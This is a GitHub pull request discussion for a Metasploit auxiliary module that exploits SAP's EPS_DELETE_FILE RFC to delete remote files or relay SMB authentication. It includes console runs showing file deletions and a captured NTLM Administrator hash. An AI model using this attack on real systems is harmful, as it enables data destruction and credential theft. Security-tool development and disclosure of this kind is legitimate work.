Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

EPS_DELETE_FILE (File Deletion and SMB Relay) #1659

Merged
merged 1 commit into from

2 participants

nmonkee Juan Vazquez
nmonkee

A vulnerability in the SAP EPS_DELETE_FILE RFC function allows an attacker to delete files remotely and/or steal hashes using an SMB relay attack.

SAP Note 1554030 / DSECRG-11-031.

ref: http://dsecrg.com/pages/vul/show.php?id=331

Juan Vazquez jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework
Merged

Cleanup for sap_soap_rfc_eps_delete_file #7

Juan Vazquez
Collaborator

Hi @nmonkee,

The pull request nmonkee#7 is applying the same changes proposed on last pull requests such as #1658, plus is moving the module to the "dos" tree, because a file deletion module is a dos module indeed. Even when it also helps to make SMBRelay attacks, it can also be done by other auxiliary scanner modules, so I thing the auxiliary/dos/sap is the correct place for this modules. As always feel free to review, test, ask, discuss anything and merge nmonkee#7 on your repo when ready. So this pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

msf auxiliary(sap_soap_rfc_eps_delete_file) > show options

Module options (auxiliary/dos/sap/sap_soap_rfc_eps_delete_file):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   DIRNAME   /tmp             yes       Directory Path which contains the file to delete
   FILENAME  msf.txt          yes       Filename to delete
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     80               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[+] 192.168.172.179:8042 - File msf.txt at /tmp successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nmonkee

Not that I am that fussed, seems that this error is received and the file is not deleted on Linux and Windows. However makes it an ineffective DoS module ;)


<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>DELETE_FAILED</faultstring><detail><rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions"><Name>DELETE_FAILED</Name></rfc:EPS_DELETE_FILE.Exception></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

SMB Relay works fine:


msf auxiliary(sap_soap_rfc_eps_delete_file) > run
[*] 192.168.1.86:8000 - Sending request to delete msf.txt at \\192.168.1.71\foo
[*] SMB Captured - 2013-05-09 21:20:07 +0100
NTLMv1 Response Captured from 192.168.1.86:50768 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Juan Vazquez
Collaborator

No, it's important, checking....

nmonkee

A search on the error, suggests case sensitivity is important.

Juan Vazquez
Collaborator

Working as expected when the owner of the file to delete is npladm

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.179:8042 - Sending request to delete w00t at /tmp/
[+] 192.168.172.179:8042 - File w00t at /tmp/ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

merging!

Juan Vazquez jvazquez-r7 referenced this pull request from a commit
jvazquez-r7 Land #1659, @nmonkee's sap_soap_rfc_eps_delete_file module 3e1d1a3
Juan Vazquez jvazquez-r7 merged commit 7ad73d8 into from
nmonkee
nmonkee nmonkee deleted the branch
Juan Vazquez
Collaborator

Checking on windows!

Juan Vazquez
Collaborator

Fixed the error on windows:

msf auxiliary(sap_soap_rfc_eps_delete_file) > reload
[*] Reloading module...
msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.185:8000 - Sending request to delete foo.txt at c:\
[+] 192.168.172.185:8000 - File foo.txt at c:\ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

See: d37d211

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on May 9, 2013
  1. nmonkee

    Merge pull request #7 from jvazquez-r7/sap_soap_rfc_eps_delete_file

    nmonkee authored
    Cleanup for sap_soap_rfc_eps_delete_file
This page is out of date. Refresh to see the latest.
Showing with 0 additions and 0 deletions.
Something went wrong with that request. Please try again.